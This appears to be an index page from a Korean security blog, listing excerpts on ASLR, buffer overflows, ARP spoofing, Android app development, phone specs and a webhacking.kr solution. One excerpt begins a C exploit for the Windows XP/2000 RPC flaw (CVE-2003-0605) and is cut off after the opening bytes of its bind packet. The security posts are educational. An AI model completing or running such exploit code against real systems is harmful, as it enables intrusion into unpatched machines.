[시스템 방어] Buffer Over Flow 에 대한 방어, ASLR 1. ASLR이란? ASLR (Address Space Layout Randomization) 은 프로그램을 실행했을 때 코드와 데이터가 항상 동일한 메모리 주소에 로드되는 것을 방지하기 위해Windows Vista 이상의 시스템에 적용된 보안 기법입니다. 프로그램이 실행되어 Windows 실행파일 (.exe) 이 메모리에 로딩될 때마다 기본 주소 (Image Base)의 값을랜덤하게 생성하여 프로세스가 메모리의 어느 부분에 로딩될지 알 수 없게 함으로써버퍼 오버플로우 취약점을 통한 공격을 차단하는 기술입니다. Windows XP 이하 시스템의 경우, 프로그램과 DLL (동적 링크 라이브러리, Dynamic Link Library) 의 메모리 주소가정해져 있었기 때문에 이를 통한 버퍼 오버플로우 공격에 .. 더보기 [시스템 해킹]버퍼 오버 플로우(Buffer Overflow) 1. 버퍼(Buffer)의 정의 및 버퍼 오버 플로우(Buffer Overflow) 의 정의 버퍼(Buffer) 란 메모리의 조각들, 다시 말해서 데이터를 저장하기 위해 휘발성으로 잠시동안 사용되는 한정적인 공간입니다. 흔하게 예를들어서 VB와 같은 프로그램으로 프로그래밍시에 버퍼의 크기를 검사하지 않고 프로그래밍할 경우 10KB 라는 할당 되어있는 저장공간이 있으면 이 메모리의 범위를 초과하는 버퍼가 입력되면 할당 된 버퍼 밖의 공간에 쓰기 가 발생하게 되는데 이 경우에 에러가 발생하게 됩니다. 이것을 버퍼 오버플로우 (Buffer Overflow) 라고 합니다. 2. 프로세스의 메모리 구조 버퍼 오버플로우를 이해하기 위해서는 먼저 프로그램의 실행 흐름과 스택(Stack) 의 구조에 대한 이해가 필요합.. 더보기 [Windows 취약점 익스플로잇] XP/2000 RPC Exploit (CVE-2003-0605) #include #include unsigned char bindstr[]={ 0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00, 0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00, 0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46, 0x00,0x00,0x00,0x00,0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00, 0x2B,0x10,0x48,0x60,0x02,0x00,.. 더보기 [네트워크]ARP 스푸핑/ARP Spoofing http://www.youtube.com/watch?v=3seUWVK_Tb0&feature=player_embedded 동영상을 참고하시면서 보시기 바랍니다. - ARP스푸핑은 스위칭 환경의 랜상에서 패킷의 흐름을 바꾸는 공격기법 입니다.즉, 쉽게 말해서 '사기치는 공격' 이라고 할 수 있습니다. 스푸핑(Spoofing)의 뜻은 '속이다' 입니다. 스푸핑 공격은 시스템에 대한 권한얻기,암호화된 세션 복호화, 네트워크 트래픽의 흐름 변경등 여러분야에 걸쳐서 사용이 됩니다. ARP스푸핑은, MAC 주소를 속이는 것입니다. 그렇게 해서 통신흐름을 왜곡시키는 것이죠.위에 이미지 처럼 컴퓨터 A 에서 컴퓨터 B로 가기 위해서는 원래는 라우터를 경유해서 가는데ARP스푸핑을 통해서 해커의 PC를 경유해서 가게 만들 .. 더보기 [이슈] Vega Iron 스펙 ! 베가 아이언(철 베가)는 옵티머스G 프로와 비슷한 스펙으로 밝혀졌습니다. -베가 아이언 스펙- 스냅드래곤 1.7GHz 쿼드코어 2GB Ram 32GB 메모리 안드로이드 4.1.2 젤리빈 1300만 화소 카메라 5인치 1280*720 2150mAh 화면크기와 해상도가 옵티머스G 프로보다 낮고 베젤(테두리)이 없는 것만 빼면 옵티머스G 프로와 유사한 점이 많습니다. 자세한것은 인터넷을 ~^-^ [출처] 베가 아이언 스펙! 갤럭시S4 vs 베가 아이언 대결!|작성자 배틀크루져 더보기 [Tip] BackGround에서 작동하는 불필요한 프로그램 제거/컴퓨터 속도 향상 안녕하십니까. CISA 입니다. 본 프로그램은 BackGround 에서 작동하는 불필요한 Greed 프로그램을 제거해 주는 프로그램입니다. 실질적으로 Virus 도 아닌 프로그램들이기에 백그라운드에서 작동한다고 하여도 V3 등 백신프로그램이 잡아낼 수 없는 프로그램들을 제거 해 주는 프로그램으로써 프로그램을 실행할 경우 "실행중인 그리드 프로그램이 있습니다" 라고 출력된다면 제거하시면 됩니다. 그리드 프로그램의 종류에는 "G downloader Service" 등 여러가지 프로그램이 있으며 사용자들이 모르게 시스템에서 작동하는 경우가 다반사입니다. 그럼 좋은 하루 되시기 바랍니다 ^^ 더보기 안드로이드 어플리케이션 개발 : 2. 코드 없이 간단한 앱 만들고 구동하기 안녕하세요 M1S Secur입니다. 이클립스의 기본적인 기능들에 대해 알았다면 이번엔 코드 없이 매우 간단한 앱을 구동하는 것에 대해 설명하겠습니다. 개발 환경이 아직 구축되어 있지 않았다면, http://shiftpsh.com/100183484839에서 개발 환경 구축을 먼저 해주시기 바랍니다. 새로운 프로젝트 만들기 ▲ 그림 2-1 New 버튼 이클립스를 실행하고 왼쪽 위의 New 버튼을 눌러 줍시다. ▲ 그림 2-2 New 대화창 다음과 같은 대화창이 뜨는데요, Android > Android Application Project를 차례로 눌러줍시다. ▲ 그림 2-3 New Android Application 대화창 이 대화창은 3가지 항목을 요구하고 있습니다. - Application Name: 어.. 더보기 안드로이드 어플리케이션 개발 : 1. 이클립스의 기능들 안녕하세요 M1S Secur입니다. 저번 포스팅에 이어 이번에는 이클립스의 기능에 대해 설명해볼까 합니다. 개발 환경이 아직 구축되어 있지 않았다면, 여기에서 개발 환경 구축을 먼저 해주시기 바랍니다. 이클립스의 기능들 안드로이드 어플리케이션을 개발할 때 가장 많이 쓰는 도구인 만큼, 많은 기능들이 들어 있습니다. 모두 알려드리기는 힘드므로 중요하고 자주 쓰는 기능들 몇 개를 알려드리도록 하겠습니다. ▲ 그림 1-1 Eclipse ADT 이클립스를 처음 실행하고 어플리케이션 프로젝트를 하나 추가하면 이런 식의 화면이 구성됩니다. 맨 위에는 긴 툴바(Toolbar)가 존재하고, 맨 왼쪽에는 패키지 익스플로러(Package Explorer), 가운데에는 에디터(Editor) 오른쪽에는 LogCat이 존재하고.. 더보기 안드로이드 어플리케이션 개발 : 0. 개발환경 구축 안녕하세요 M1S Secur입니다. 오늘부터 안드로이드 앱 개발에 관해 포스팅을 조금씩 연재해볼까 합니다.(네이버 블로그에서 가져오는 포스팅입니다) 안드로이드 개발 환경 모든 프로그래밍 언어는 개발 환경이 필요합니다. 안드로이드도 Java 언어를 가용하기 때문에, 당연히 개발 환경이 필요합니다. 안드로이드 개발 환경의 구축에 대해서 알아보도록 합시다. JDK(Java Development Kit) ▲ 그림 0-1 자바 개발사 오라클(Oracle) 홈페이지. 안드로이드는 자바를 사용해 구동되기 때문에, 오라클에서 제공하는 JDK가 없으면 어플리케이션을 개발하기는 힘듭니다. 일단 JDK를 다운로드 및 설치하기 위해 오라클 다운로드 센터(http://www.oracle.com/technetwork/indexe.. 더보기 webhacking.kr 2번 문제 풀이 본 PDF 파일의 저작권은 M1S Secur 에게 있지 않습니다. 더보기 이전 1 ··· 45 46 47 48 49 50 51 ··· 58 다음 목록 더보기
